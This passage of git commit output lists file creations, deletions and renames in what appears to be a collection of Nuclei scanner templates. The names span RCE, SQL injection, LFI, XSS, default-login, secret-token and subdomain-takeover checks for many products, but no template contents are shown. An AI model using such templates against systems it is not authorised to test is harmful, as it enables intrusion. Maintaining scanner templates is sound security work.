nuclei-templates/Other/salesforce-aura-9983.yaml delete mode 100644 nuclei-templates/Other/salesforce-aura.yaml create mode 100644 nuclei-templates/Other/samba-config-9987.yaml delete mode 100644 nuclei-templates/Other/samba-config.yaml delete mode 100644 nuclei-templates/Other/samba-detect-9990.yaml create mode 100644 nuclei-templates/Other/samba-detect.yaml rename nuclei-templates/Other/{samba-swat-panel.yaml => samba-swat-panel-9991.yaml} (100%) delete mode 100644 nuclei-templates/Other/samsung-printer-detect-9993.yaml create mode 100644 nuclei-templates/Other/samsung-printer-detect.yaml rename 
nuclei-templates/Other/{samsung-wlan-ap-default-credentials.yaml => samsung-wlan-ap-default-credentials-9995.yaml} (100%) create mode 100644 nuclei-templates/Other/samsung-wlan-default-login-10017.yaml delete mode 100644 nuclei-templates/Other/samsung-wlan-default-login.yaml rename nuclei-templates/Other/{sangfor-BA-rce.yaml => sangfor-ba-rce-10020.yaml} (100%) delete mode 100644 nuclei-templates/Other/sangfor-edr-rce-10025.yaml create mode 100644 nuclei-templates/Other/sangfor-edr-rce-10029.yaml create mode 100644 nuclei-templates/Other/sangfor.yaml rename nuclei-templates/Other/{sap-hana-xsengine-panel.yaml => sap-hana-xsengine-panel-10037.yaml} (100%) delete mode 100644 nuclei-templates/Other/sap-igs-detect-10039.yaml create mode 100644 nuclei-templates/Other/sap-igs-detect.yaml rename nuclei-templates/Other/{sap-netweaver-detect.yaml => sap-netweaver-detect-10046.yaml} (100%) create mode 100644 nuclei-templates/Other/sap-netweaver-info-leak-10051.yaml delete mode 100644 nuclei-templates/Other/sap-netweaver-info-leak.yaml create mode 100644 nuclei-templates/Other/sap-netweaver-rce.yaml create mode 100644 nuclei-templates/Other/sap-netweaver-webgui-10059.yaml delete mode 100644 nuclei-templates/Other/sap-netweaver-webgui.yaml create mode 100644 nuclei-templates/Other/sap-redirect-10064.yaml rename nuclei-templates/Other/{sap-web-dispatcher-10078.yaml => sap-web-dispatcher-10075.yaml} (100%) rename nuclei-templates/Other/{sapfiori-panel.yaml => sapfiori-panel-10033.yaml} (100%) delete mode 100644 nuclei-templates/Other/sar2html-rce-10082.yaml create mode 100644 nuclei-templates/Other/sar2html-rce.yaml create mode 100644 nuclei-templates/Other/sauter-login-10088.yaml delete mode 100644 nuclei-templates/Other/sauter-login.yaml delete mode 100644 nuclei-templates/Other/sceditor-detect-10093.yaml create mode 100644 nuclei-templates/Other/sceditor-detect-10094.yaml create mode 100644 nuclei-templates/Other/scs-landfill-control-10098.yaml delete mode 100644 
nuclei-templates/Other/scs-landfill-control.yaml create mode 100644 nuclei-templates/Other/scx-6555n.yaml create mode 100644 nuclei-templates/Other/seacms-rce-10102.yaml delete mode 100644 nuclei-templates/Other/seacms-rce.yaml delete mode 100644 nuclei-templates/Other/seacms-sqli-10103.yaml create mode 100644 nuclei-templates/Other/seacms-sqli.yaml rename nuclei-templates/Other/{Seagate-media-sqli.yaml => seagate-media-sqli.yaml} (100%) delete mode 100644 nuclei-templates/Other/searchbar.yaml create mode 100644 nuclei-templates/Other/searches.yaml create mode 100644 nuclei-templates/Other/seats-login-10107.yaml delete mode 100644 nuclei-templates/Other/seats-login.yaml create mode 100644 nuclei-templates/Other/secmail-detect-10111.yaml delete mode 100644 nuclei-templates/Other/secmail-detect.yaml rename nuclei-templates/Other/{secnet-ac-default-login.yaml => secnet-ac-default-login-10113.yaml} (100%) create mode 100644 nuclei-templates/Other/secure-downloads.yaml delete mode 100644 nuclei-templates/Other/securenvoy-panel-10116.yaml create mode 100644 nuclei-templates/Other/securenvoy-panel.yaml create mode 100644 nuclei-templates/Other/securityspy-detect-10119.yaml delete mode 100644 nuclei-templates/Other/securityspy-detect-10121.yaml create mode 100644 nuclei-templates/Other/seeddms-default-login-10128.yaml delete mode 100644 nuclei-templates/Other/seeddms-default-login.yaml delete mode 100644 nuclei-templates/Other/seeddms-detect-10131.yaml create mode 100644 nuclei-templates/Other/seeddms-detect.yaml create mode 100644 nuclei-templates/Other/seeddms.yaml create mode 100644 nuclei-templates/Other/selea-ip-camera-10136.yaml delete mode 100644 nuclei-templates/Other/selea-ip-camera.yaml delete mode 100644 nuclei-templates/Other/selenium-exposure-10137.yaml create mode 100644 nuclei-templates/Other/selenium-exposure-10138.yaml create mode 100644 nuclei-templates/Other/self_service.yaml create mode 100644 
nuclei-templates/Other/senayan_library_management_system.yaml rename nuclei-templates/Other/{sendgrid-api(1).yaml => sendgrid-api-11859.yaml} (100%) rename nuclei-templates/Other/{nuxt_fs.yaml => sensei-message-wp.yaml} (100%) create mode 100644 nuclei-templates/Other/sensitive-storage-data-exposure-1.yaml create mode 100644 nuclei-templates/Other/sensitive-storage-data-exposure-2.yaml create mode 100644 nuclei-templates/Other/sensitive-storage-data-exposure-3.yaml create mode 100644 nuclei-templates/Other/sensitive-storage-data-exposure-4.yaml create mode 100644 nuclei-templates/Other/sensitive-storage-data-exposure-5.yaml create mode 100644 nuclei-templates/Other/sensitive-storage-data-exposure-6.yaml rename nuclei-templates/Other/{sensitive-storage-exposure-10143.yaml => sensitive-storage-exposure.yaml} (100%) create mode 100644 nuclei-templates/Other/seowon-router-rce-10147.yaml delete mode 100644 nuclei-templates/Other/seowon-router-rce.yaml create mode 100644 nuclei-templates/Other/sequoiadb-default-login-10150.yaml delete mode 100644 nuclei-templates/Other/sequoiadb-default-login.yaml rename nuclei-templates/Other/{server-backup-login.yaml => server-backup-login-10156.yaml} (100%) delete mode 100644 nuclei-templates/Other/server-backup-manager-se-login-detect.yaml create mode 100644 nuclei-templates/Other/server-backup-manager-se.yaml create mode 100644 nuclei-templates/Other/server-status-localhost-10165.yaml delete mode 100644 nuclei-templates/Other/server-status-localhost.yaml create mode 100644 nuclei-templates/Other/servfail-refused-hosts-10167.yaml delete mode 100644 nuclei-templates/Other/servfail-refused-hosts.yaml rename nuclei-templates/Other/{servicedesk-login-panel-10171.yaml => servicedesk-login-panel-10173.yaml} (100%) rename nuclei-templates/Other/{servicenow-helpdesk-credential.yaml => servicenow-helpdesk-credential-10175.yaml} (100%) delete mode 100644 nuclei-templates/Other/setPreferences-xss.yaml rename 
nuclei-templates/Other/{sgp-login-panel.yaml => sgp-login-panel-10185.yaml} (100%) create mode 100644 nuclei-templates/Other/sharecenter-login-10189.yaml delete mode 100644 nuclei-templates/Other/sharecenter-login-10190.yaml create mode 100644 nuclei-templates/Other/shell-history-10191.yaml delete mode 100644 nuclei-templates/Other/shell-history.yaml rename nuclei-templates/Other/{Shipped100-sqli.yaml => shipped100-sqli.yaml} (100%) delete mode 100644 nuclei-templates/Other/shopify-custom-token.yaml rename nuclei-templates/Other/{shopify-private-token-10199.yaml => shopify-private-token(1).yaml} (100%) create mode 100644 nuclei-templates/Other/shopify-shared-secret(1).yaml delete mode 100644 nuclei-templates/Other/shopify-shared-secret.yaml rename nuclei-templates/Other/{shopify-takeover-10202.yaml => shopify-takeover-10203.yaml} (100%) rename nuclei-templates/Other/{shoppable-token.yaml => shoppable-token-10209.yaml} (100%) create mode 100644 nuclei-templates/Other/shopware-detect-10213.yaml delete mode 100644 nuclei-templates/Other/shopware-detect.yaml create mode 100644 nuclei-templates/Other/shopxo.yaml create mode 100644 nuclei-templates/Other/short-io-takeover.yaml delete mode 100644 nuclei-templates/Other/short-io.yaml create mode 100644 nuclei-templates/Other/shortcode-lfi-10214.yaml delete mode 100644 nuclei-templates/Other/shortcode-lfi.yaml delete mode 100644 nuclei-templates/Other/shoutcast-server-10217.yaml create mode 100644 nuclei-templates/Other/shoutcast-server.yaml delete mode 100644 nuclei-templates/Other/showdoc-default-login-10221.yaml create mode 100644 nuclei-templates/Other/showdoc-default-login.yaml rename nuclei-templates/Other/{showdoc-file-upload-rce-10229.yaml => showdoc-file-upload-rce-10226.yaml} (100%) create mode 100644 nuclei-templates/Other/sick-beard-xss-10233.yaml delete mode 100644 nuclei-templates/Other/sick-beard-xss.yaml create mode 100644 nuclei-templates/Other/sidekiq-dashboard-10236.yaml delete mode 100644 
nuclei-templates/Other/sidekiq-dashboard.yaml create mode 100644 nuclei-templates/Other/sigma_wide.yaml create mode 100644 nuclei-templates/Other/signatures-10259.yaml rename nuclei-templates/Other/{liferay.yaml => signatures-10266.yaml} (100%) create mode 100644 nuclei-templates/Other/simple-crm-sql-injection-10278.yaml delete mode 100644 nuclei-templates/Other/simple-crm-sql-injection.yaml create mode 100644 nuclei-templates/Other/simple-employee-rce-10279.yaml delete mode 100644 nuclei-templates/Other/simple-employee-rce.yaml create mode 100644 nuclei-templates/Other/site-map-sql-injection.yaml rename nuclei-templates/Other/{sitecore-login-10287.yaml => sitecore-login-10289.yaml} (100%) create mode 100644 nuclei-templates/Other/sitecore-version-10291.yaml delete mode 100644 nuclei-templates/Other/sitecore-version.yaml rename nuclei-templates/Other/{SiteCore.yaml => sitecore.yaml} (100%) delete mode 100644 nuclei-templates/Other/sitemap-sql-injection.yaml rename nuclei-templates/Other/{skycaiji-admin-panel-10304.yaml => skycaiji-admin-panel-10306.yaml} (100%) create mode 100644 nuclei-templates/Other/skycaiji-install-10309.yaml delete mode 100644 nuclei-templates/Other/skycaiji-install.yaml create mode 100644 nuclei-templates/Other/slack-bot-token-10310.yaml delete mode 100644 nuclei-templates/Other/slack-bot-token-10313.yaml rename nuclei-templates/Other/{slocum-login.yaml => slocum-login-10317.yaml} (100%) create mode 100644 nuclei-templates/Other/smartling-takeover-10327.yaml delete mode 100644 nuclei-templates/Other/smartling-takeover.yaml create mode 100644 nuclei-templates/Other/smartsense-default-login-10331.yaml delete mode 100644 nuclei-templates/Other/smartsense-default-login.yaml create mode 100644 nuclei-templates/Other/smugmug-takeover-10340.yaml delete mode 100644 nuclei-templates/Other/smugmug-takeover.yaml rename nuclei-templates/Other/{sniplets-lfi.yaml => sniplets-lfi-10343.yaml} (100%) rename nuclei-templates/Other/{sniplets-xss.yaml => 
sniplets-xss-10344.yaml} (100%) create mode 100644 nuclei-templates/Other/snyk-ignore-file-disclosure-10347.yaml delete mode 100644 nuclei-templates/Other/snyk-ignore-file-disclosure.yaml create mode 100644 nuclei-templates/Other/sofneta-mecdream-pacs-lfi-10351.yaml delete mode 100644 nuclei-templates/Other/sofneta-mecdream-pacs-lfi.yaml create mode 100644 nuclei-templates/Other/solarwinds-default-admin-1.yaml create mode 100644 nuclei-templates/Other/solarwinds-default-login-10354.yaml delete mode 100644 nuclei-templates/Other/solarwinds-default-login.yaml delete mode 100644 nuclei-templates/Other/solarwinds-orion-10357.yaml create mode 100644 nuclei-templates/Other/solarwinds-orion-10359.yaml rename nuclei-templates/Other/{solarwinds-servuftp-detect.yaml => solarwinds-servuftp-detect-10360.yaml} (100%) rename nuclei-templates/Other/{solr-fileRead.yaml => solr-fileread.yaml} (100%) rename nuclei-templates/Other/{somfy-login-10371.yaml => somfy-login-10373.yaml} (100%) create mode 100644 nuclei-templates/Other/sonarqube-token-10382.yaml delete mode 100644 nuclei-templates/Other/sonarqube-token.yaml delete mode 100644 nuclei-templates/Other/sonicwall-management-panel-10387.yaml create mode 100644 nuclei-templates/Other/sonicwall-management-panel.yaml rename nuclei-templates/Other/{sonicwall-sslvpn-panel.yaml => sonicwall-sslvpn-panel-10388.yaml} (100%) create mode 100644 nuclei-templates/Other/sonicwall-sslvpn-shellshock-10393.yaml delete mode 100644 nuclei-templates/Other/sonicwall-sslvpn-shellshock.yaml rename nuclei-templates/Other/{sophos-fw-version-detect.yaml => sophos-fw-version-detect-10397.yaml} (100%) create mode 100644 nuclei-templates/Other/spark-webui-unauth-10401.yaml delete mode 100644 nuclei-templates/Other/spark-webui-unauth.yaml create mode 100644 nuclei-templates/Other/spectracom-default-login-10405.yaml delete mode 100644 nuclei-templates/Other/spectracom-default-login.yaml rename nuclei-templates/Other/{sphider-login.yaml => 
sphider-login-10408.yaml} (100%) create mode 100644 nuclei-templates/Other/spidercontrol-scada-server-info-10411.yaml delete mode 100644 nuclei-templates/Other/spidercontrol-scada-server-info.yaml delete mode 100644 nuclei-templates/Other/splunk-enterprise-login-panel.yaml create mode 100644 nuclei-templates/Other/splunk-enterprise-panel-10415.yaml rename nuclei-templates/Other/{splunk-login.yaml => splunk-login-10419.yaml} (100%) create mode 100644 nuclei-templates/Other/spotify.yaml rename nuclei-templates/Other/{nginx_Misconfiguration.yaml => spring_collection.yaml} (100%) rename nuclei-templates/Other/{springboot-actuator-10434.yaml => springboot-actuator-10433.yaml} (100%) create mode 100644 nuclei-templates/Other/springboot-actuators-jolokia-xxe-10432.yaml delete mode 100644 nuclei-templates/Other/springboot-actuators-jolokia-xxe.yaml create mode 100644 nuclei-templates/Other/springboot-env-10450.yaml delete mode 100644 nuclei-templates/Other/springboot-env.yaml create mode 100644 nuclei-templates/Other/springboot-gateway-10453.yaml delete mode 100644 nuclei-templates/Other/springboot-gateway.yaml create mode 100644 nuclei-templates/Other/springboot-health-10459.yaml delete mode 100644 nuclei-templates/Other/springboot-health.yaml create mode 100644 nuclei-templates/Other/springboot-heapdump-10465.yaml create mode 100644 nuclei-templates/Other/springboot-httptrace-10467.yaml delete mode 100644 nuclei-templates/Other/springboot-httptrace.yaml delete mode 100644 nuclei-templates/Other/springboot-info-10470.yaml create mode 100644 nuclei-templates/Other/springboot-info-10471.yaml create mode 100644 nuclei-templates/Other/springboot-log4j-rce-10474.yaml delete mode 100644 nuclei-templates/Other/springboot-log4j-rce.yaml create mode 100644 nuclei-templates/Other/springboot-metrics-10482.yaml create mode 100644 nuclei-templates/Other/springboot-threaddump-10485.yaml delete mode 100644 nuclei-templates/Other/springboot-threaddump.yaml delete mode 100644 
nuclei-templates/Other/springboot-trace-10492.yaml create mode 100644 nuclei-templates/Other/springboot-trace.yaml create mode 100644 nuclei-templates/Other/sprintful-takeover-10495.yaml delete mode 100644 nuclei-templates/Other/sprintful-takeover.yaml create mode 100644 nuclei-templates/Other/sql-dump-10496.yaml delete mode 100644 nuclei-templates/Other/sql-dump.yaml create mode 100644 nuclei-templates/Other/sql-server-reporting-10508.yaml delete mode 100644 nuclei-templates/Other/sql-server-reporting.yaml delete mode 100644 nuclei-templates/Other/sqli-error-based.yaml rename nuclei-templates/Other/{squirrelmail-add-xss.yaml => squirrelmail-add-xss-10515.yaml} (100%) delete mode 100644 nuclei-templates/Other/squirrelmail-login-10519.yaml create mode 100644 nuclei-templates/Other/squirrelmail-login-10521.yaml rename nuclei-templates/Other/{ssh-authorized-keys.yaml => ssh-authorized-keys-10523.yaml} (100%) delete mode 100644 nuclei-templates/Other/ssti.yaml create mode 100644 nuclei-templates/Other/stackstorm-default-login-10530.yaml delete mode 100644 nuclei-templates/Other/stackstorm-default-login.yaml rename nuclei-templates/Other/{stem-audio-table-private-keys-10535.yaml => stem-audio-table-private-keys-10534.yaml} (100%) create mode 100644 nuclei-templates/Other/steve.yaml rename nuclei-templates/Other/{strapi-documentation.yaml => strapi-documentation-10543.yaml} (100%) rename nuclei-templates/Other/{2904374066.yaml => stratum.yaml} (100%) create mode 100644 nuclei-templates/Other/streampipes.yaml create mode 100644 nuclei-templates/Other/strikingly-takeover-10551.yaml delete mode 100644 nuclei-templates/Other/strikingly-takeover.yaml rename nuclei-templates/Other/{stripe-api-key.yaml => stripe-api-key-11869.yaml} (100%) rename nuclei-templates/Other/{stripe-restricted-key.yaml => stripe-restricted-key-10555.yaml} (100%) delete mode 100755 nuclei-templates/Other/stripe-secret-key-10556.yaml create mode 100644 nuclei-templates/Other/stripe-secret-key-10558.yaml 
create mode 100644 nuclei-templates/Other/struts-problem-report-10564.yaml delete mode 100644 nuclei-templates/Other/struts-problem-report.yaml create mode 100644 nuclei-templates/Other/subdomain-takeover-dns-10566.yaml delete mode 100644 nuclei-templates/Other/subdomain-takeover-dns.yaml create mode 100644 nuclei-templates/Other/subdomain-takeover.yaml create mode 100644 nuclei-templates/Other/submitty-login-10568.yaml delete mode 100644 nuclei-templates/Other/submitty-login.yaml rename nuclei-templates/Other/{supervpn-panel.yaml => supervpn-panel-10575.yaml} (100%) rename nuclei-templates/Other/{urge-takeover.yaml => surge-takeover-10579.yaml} (100%) rename nuclei-templates/Other/{svnserve-config.yaml => svnserve-config-10590.yaml} (100%) create mode 100644 nuclei-templates/Other/swagger-api-10593.yaml create mode 100644 nuclei-templates/Other/swagger-api-11.yaml delete mode 100644 nuclei-templates/Other/symantec-dlp-login-10596.yaml create mode 100644 nuclei-templates/Other/symantec-dlp-login.yaml create mode 100644 nuclei-templates/Other/symantec-epm-login-10602.yaml delete mode 100644 nuclei-templates/Other/symantec-epm-login.yaml delete mode 100644 nuclei-templates/Other/symantec-ewep-login-10603.yaml create mode 100644 nuclei-templates/Other/symantec-ewep-login.yaml create mode 100644 nuclei-templates/Other/symantec-messaging-gateway.yaml rename nuclei-templates/Other/{symfony-database-config.yaml => symfony-database-config-10615.yaml} (100%) create mode 100644 nuclei-templates/Other/symfony-profiler-10625.yaml delete mode 100644 nuclei-templates/Other/symfony-profiler.yaml create mode 100644 nuclei-templates/Other/symfonyrce.yaml create mode 100644 nuclei-templates/Other/szhe-default-login-10636.yaml delete mode 100644 nuclei-templates/Other/szhe-default-login.yaml create mode 100644 nuclei-templates/Other/t24.yaml delete mode 100644 nuclei-templates/Other/tableau-panel-10641.yaml create mode 100644 nuclei-templates/Other/tableau-panel-10642.yaml delete 
mode 100644 nuclei-templates/Other/tableau-server-detect-10643.yaml create mode 100644 nuclei-templates/Other/tableau-server-detect.yaml create mode 100644 nuclei-templates/Other/tabnabbing-check-10646.yaml delete mode 100644 nuclei-templates/Other/tabnabbing-check.yaml create mode 100644 nuclei-templates/Other/tamronos-rce-10651.yaml delete mode 100644 nuclei-templates/Other/tamronos-rce.yaml create mode 100644 nuclei-templates/Other/tamronos.yaml rename nuclei-templates/Other/{targa-camera-lfi.yaml => targa-camera-lfi-10654.yaml} (100%) create mode 100644 nuclei-templates/Other/tave-takeover-10660.yaml delete mode 100644 nuclei-templates/Other/tave-takeover.yaml create mode 100644 nuclei-templates/Other/tcp.yaml rename nuclei-templates/Other/{tcpconfig.yaml => tcpconfig-10665.yaml} (100%) rename nuclei-templates/Other/{tech-detect.yaml => tech-detect-10673.yaml} (100%) rename nuclei-templates/Other/{tectuus-scada-monitor-10681.yaml => tectuus-scada-monitor-10679.yaml} (100%) create mode 100644 nuclei-templates/Other/tekon-info-leak-10684.yaml delete mode 100644 nuclei-templates/Other/tekon-info-leak.yaml rename nuclei-templates/Other/{telerik-dialoghandler-detect-10689.yaml => telerik-dialoghandler-detect-10691.yaml} (100%) create mode 100644 nuclei-templates/Other/telerik-fileupload-detect-10693.yaml delete mode 100644 nuclei-templates/Other/telerik-fileupload-detect-10696.yaml create mode 100644 nuclei-templates/Other/telerik_report_server.yaml delete mode 100644 nuclei-templates/Other/teradici-pcoip-10703.yaml create mode 100644 nuclei-templates/Other/teradici-pcoip-10704.yaml rename nuclei-templates/Other/{terraform-detect.yaml => terraform-detect-10707.yaml} (100%) create mode 100644 nuclei-templates/Other/terraform-enterprise-panel-10712.yaml delete mode 100644 nuclei-templates/Other/terraform-enterprise-panel.yaml create mode 100644 nuclei-templates/Other/thinkcmf-detection-10719.yaml delete mode 100644 nuclei-templates/Other/thinkcmf-detection.yaml create 
mode 100644 nuclei-templates/Other/thinkcmf-lfi-10721.yaml delete mode 100644 nuclei-templates/Other/thinkcmf-lfi.yaml delete mode 100644 nuclei-templates/Other/thinkcmf-rce-10728.yaml create mode 100644 nuclei-templates/Other/thinkcmf-rce-10729.yaml rename nuclei-templates/Other/{thinkcmf-workflow-10730.yaml => thinkcmf-workflow-10731.yaml} (100%) rename nuclei-templates/Other/{thinkific-redirect.yaml => thinkific-redirect-10734.yaml} (100%) create mode 100644 nuclei-templates/Other/thinkphp-2-rce-10738.yaml delete mode 100644 nuclei-templates/Other/thinkphp-2-rce-10741.yaml delete mode 100644 nuclei-templates/Other/thinkphp-501-rce-10743.yaml create mode 100644 nuclei-templates/Other/thinkphp-501-rce.yaml create mode 100644 nuclei-templates/Other/thinkphp-5022-rce-10744.yaml delete mode 100644 nuclei-templates/Other/thinkphp-5022-rce-10747.yaml create mode 100644 nuclei-templates/Other/thinkphp-5023-rce-10748.yaml delete mode 100644 nuclei-templates/Other/thinkphp-5023-rce.yaml delete mode 100644 nuclei-templates/Other/thinkphp-509-information-disclosure-10752.yaml create mode 100644 nuclei-templates/Other/thinkphp-509-information-disclosure-10753.yaml rename nuclei-templates/Other/{threatq-login-10756.yaml => threatq-login.yaml} (100%) create mode 100644 nuclei-templates/Other/tianqing-info-leak-10765.yaml delete mode 100644 nuclei-templates/Other/tianqing-info-leak.yaml create mode 100644 nuclei-templates/Other/tictail-takeover-10768.yaml delete mode 100644 nuclei-templates/Other/tictail-takeover.yaml create mode 100644 nuclei-templates/Other/tikiwiki-cms-10775.yaml delete mode 100644 nuclei-templates/Other/tikiwiki-cms.yaml delete mode 100644 nuclei-templates/Other/tikiwiki-json-rpc.yaml rename nuclei-templates/Other/{tikiwiki-reflected-xss-10778.yaml => tikiwiki-reflected-xss.yaml} (100%) rename nuclei-templates/Other/{tilda-takeover.yaml => tilda-takeover-10782.yaml} (100%) delete mode 100644 nuclei-templates/Other/tileserver-gl-10786.yaml create mode 100644 
nuclei-templates/Other/tileserver-gl-10787.yaml create mode 100644 nuclei-templates/Other/tinyfilemanager.yaml create mode 100644 nuclei-templates/Other/tomcat-detect-10794.yaml delete mode 100644 nuclei-templates/Other/tomcat-detect.yaml delete mode 100644 nuclei-templates/Other/tomcat-examples-login.yaml create mode 100644 nuclei-templates/Other/tomcat-examples-login_CVE-2022-34305.yaml create mode 100644 nuclei-templates/Other/tomcat-manager-pathnormalization-1.yaml create mode 100644 nuclei-templates/Other/tomcat-manager-pathnormalization-2.yaml rename nuclei-templates/Other/{tomcat-manager-pathnormalization-10796.yaml => tomcat-manager-pathnormalization.yaml} (100%) rename nuclei-templates/Other/{tomcat-scripts.yaml => tomcat-scripts-10802.yaml} (100%) create mode 100644 nuclei-templates/Other/tooljet.yaml create mode 100644 nuclei-templates/Other/top-xss-params-10807.yaml delete mode 100644 nuclei-templates/Other/top-xss-params.yaml create mode 100644 nuclei-templates/Other/topsec-topacm-rce.yaml rename nuclei-templates/Other/{tor-socks-proxy-10811.yaml => tor-socks-proxy.yaml} (100%) delete mode 100644 nuclei-templates/Other/total-web-10816.yaml create mode 100644 nuclei-templates/Other/total-web.yaml rename nuclei-templates/Other/{tpshop-directory-traversal-10823.yaml => tpshop-directory-traversal-10822.yaml} (100%) create mode 100644 nuclei-templates/Other/traccar.yaml rename nuclei-templates/Other/{trace-axd-detect-10826.yaml => trace-axd-detect-10825.yaml} (100%) create mode 100644 nuclei-templates/Other/trace-method-10829.yaml delete mode 100644 nuclei-templates/Other/trace-method.yaml create mode 100644 nuclei-templates/Other/traefik-dashboard-10832.yaml delete mode 100644 nuclei-templates/Other/traefik-dashboard.yaml delete mode 100644 nuclei-templates/Other/trilithic-viewpoint-default.yaml create mode 100644 nuclei-templates/Other/trilithic-viewpoint-login.yaml create mode 100644 nuclei-templates/Other/triton-lite.yaml delete mode 100644 
nuclei-templates/Other/tugboat-config-exposure-10843.yaml create mode 100644 nuclei-templates/Other/tugboat-config-exposure-10844.yaml create mode 100644 nuclei-templates/Other/tumblr-takeover-10846.yaml delete mode 100644 nuclei-templates/Other/tumblr-takeover.yaml create mode 100644 nuclei-templates/Other/turbocrm-xss-10848.yaml delete mode 100644 nuclei-templates/Other/turbocrm-xss-10850.yaml create mode 100644 nuclei-templates/Other/turbomeeting.yaml rename nuclei-templates/Other/{tuxedo-connected-controller-10853.yaml => tuxedo-connected-controller-10852.yaml} (100%) create mode 100644 nuclei-templates/Other/tweaker5.yaml delete mode 100644 nuclei-templates/Other/twig-php-ssti-10858.yaml create mode 100644 nuclei-templates/Other/twig-php-ssti-10859.yaml delete mode 100644 nuclei-templates/Other/twilio-api-10860.yaml create mode 100644 nuclei-templates/Other/twilio-api-10861.yaml create mode 100644 nuclei-templates/Other/twitter-secret-11870.yaml delete mode 100644 nuclei-templates/Other/twitter-secret.yaml rename nuclei-templates/Other/{txt-fingerprint.yaml => txt-fingerprint-10863.yaml} (100%) delete mode 100644 nuclei-templates/Other/uberflip-takeover-10864.yaml create mode 100644 nuclei-templates/Other/uberflip-takeover.yaml delete mode 100644 nuclei-templates/Other/ucmdb-default-login-10869.yaml create mode 100644 nuclei-templates/Other/ucmdb-default-login.yaml rename nuclei-templates/Other/{umbraco-base-ssrf.yaml => umbraco-base-ssrf-10882.yaml} (100%) rename nuclei-templates/Other/{signatures-10251.yaml => umbraco.yaml} (100%) rename nuclei-templates/Other/{unauth-ftp-10942.yaml => unauth-ftp-10940.yaml} (100%) rename nuclei-templates/Other/{unauth-hoteldruid-panel.yaml => unauth-hoteldruid-panel-10943.yaml} (100%) rename nuclei-templates/Other/{unauth-message-read.yaml => unauth-message-read-10947.yaml} (100%) create mode 100644 nuclei-templates/Other/unauth-rlm-10960.yaml delete mode 100644 nuclei-templates/Other/unauth-rlm.yaml create mode 100644 
nuclei-templates/Other/unauth-spark-api-10963.yaml delete mode 100644 nuclei-templates/Other/unauth-spark-api.yaml create mode 100644 nuclei-templates/Other/unauth-xproxy-dashboard-10968.yaml delete mode 100644 nuclei-templates/Other/unauth-xproxy-dashboard.yaml rename nuclei-templates/Other/{unauthenticated-airflow-10886.yaml => unauthenticated-airflow-10884.yaml} (100%) delete mode 100644 nuclei-templates/Other/unauthenticated-alert-manager-10890.yaml create mode 100644 nuclei-templates/Other/unauthenticated-alert-manager-10892.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-frp-10897.yaml create mode 100644 nuclei-templates/Other/unauthenticated-frp.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-influxdb-10903.yaml create mode 100644 nuclei-templates/Other/unauthenticated-influxdb.yaml create mode 100644 nuclei-templates/Other/unauthenticated-lansweeper-10906.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-lansweeper.yaml rename nuclei-templates/Other/{unauthenticated-mongo-express-10908.yaml => unauthenticated-mongo-express-10909.yaml} (100%) rename nuclei-templates/Other/{unauthenticated-netdata.yaml => unauthenticated-netdata-10916.yaml} (100%) create mode 100644 nuclei-templates/Other/unauthenticated-popup-upload-10923.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-popup-upload.yaml rename nuclei-templates/Other/{unauthenticated-tensorboard.yaml => unauthenticated-tensorboard-10930.yaml} (100%) create mode 100644 nuclei-templates/Other/unauthenticated-zipkin-10935.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-zipkin.yaml rename nuclei-templates/Other/{unauthenticated-zippkin.yaml => unauthenticated-zippkin-10937.yaml} (100%) create mode 100644 nuclei-templates/Other/unauthorized-plastic-scm-10957.yaml delete mode 100644 nuclei-templates/Other/unauthorized-plastic-scm.yaml delete mode 100644 nuclei-templates/Other/unauthorized-puppet-node-manager-detect-10959.yaml create mode 
100644 nuclei-templates/Other/unauthorized-puppet-node-manager-detect.yaml rename nuclei-templates/Other/{unbounce-takeover-10971.yaml => unbounce-takeover-10970.yaml} (100%) create mode 100644 nuclei-templates/Other/unencrypted-bigip-ltm-cookie-10972.yaml create mode 100644 nuclei-templates/Other/unifi-network-log4j-rce-10976.yaml delete mode 100644 nuclei-templates/Other/unifi-network-log4j-rce.yaml create mode 100644 nuclei-templates/Other/unifi_network_application.yaml create mode 100644 nuclei-templates/Other/unified_communications_domain_manager.yaml delete mode 100644 nuclei-templates/Other/unpatched-coldfusion-10977.yaml create mode 100644 nuclei-templates/Other/unpatched-coldfusion.yaml create mode 100644 nuclei-templates/Other/ups-status-10984.yaml delete mode 100644 nuclei-templates/Other/ups-status.yaml create mode 100644 nuclei-templates/Other/usg1000_firmware.yaml create mode 100644 nuclei-templates/Other/vanguard-post-xss-10992.yaml delete mode 100644 nuclei-templates/Other/vanguard-post-xss.yaml create mode 100644 nuclei-templates/Other/vcenter_server.yaml create mode 100644 nuclei-templates/Other/vec40g.yaml create mode 100644 nuclei-templates/Other/vend-takeover-10997.yaml delete mode 100644 nuclei-templates/Other/vend-takeover.yaml create mode 100644 nuclei-templates/Other/versa-default-login-11003.yaml delete mode 100644 nuclei-templates/Other/versa-default-login.yaml delete mode 100644 nuclei-templates/Other/versa-sdwan-11005.yaml create mode 100644 nuclei-templates/Other/versa-sdwan.yaml create mode 100644 nuclei-templates/Other/versa_operating_system.yaml delete mode 100644 nuclei-templates/Other/vidyo-default-login-11008.yaml create mode 100644 nuclei-templates/Other/vidyo-default-login.yaml create mode 100644 nuclei-templates/Other/viewlinc-crlf-injection-11014.yaml delete mode 100644 nuclei-templates/Other/viewlinc-crlf-injection.yaml delete mode 100644 nuclei-templates/Other/viewpoint-system-status-11018.yaml create mode 100644 
nuclei-templates/Other/viewpoint-system-status-11019.yaml delete mode 100644 nuclei-templates/Other/virtual-ema-detect-11025.yaml create mode 100644 nuclei-templates/Other/virtual-ema-detect.yaml create mode 100644 nuclei-templates/Other/visionhub-default-login-11029.yaml delete mode 100644 nuclei-templates/Other/visionhub-default-login.yaml delete mode 100644 nuclei-templates/Other/visual-tools-dvr-rce-11030.yaml create mode 100644 nuclei-templates/Other/visual-tools-dvr-rce-11032.yaml rename nuclei-templates/Other/{vmware-horizon.yaml => vmware-horizon-11038.yaml} (100%) create mode 100644 nuclei-templates/Other/vmware-horizon-log4j-jndi-rce-11033.yaml delete mode 100644 nuclei-templates/Other/vmware-horizon-log4j-jndi-rce-11034.yaml create mode 100644 nuclei-templates/Other/vmware-horizon-panel-11037.yaml delete mode 100644 nuclei-templates/Other/vmware-horizon-panel.yaml rename nuclei-templates/Other/{vmware-vcenter-lfi.yaml => vmware-vcenter-lfi-11048.yaml} (100%) create mode 100644 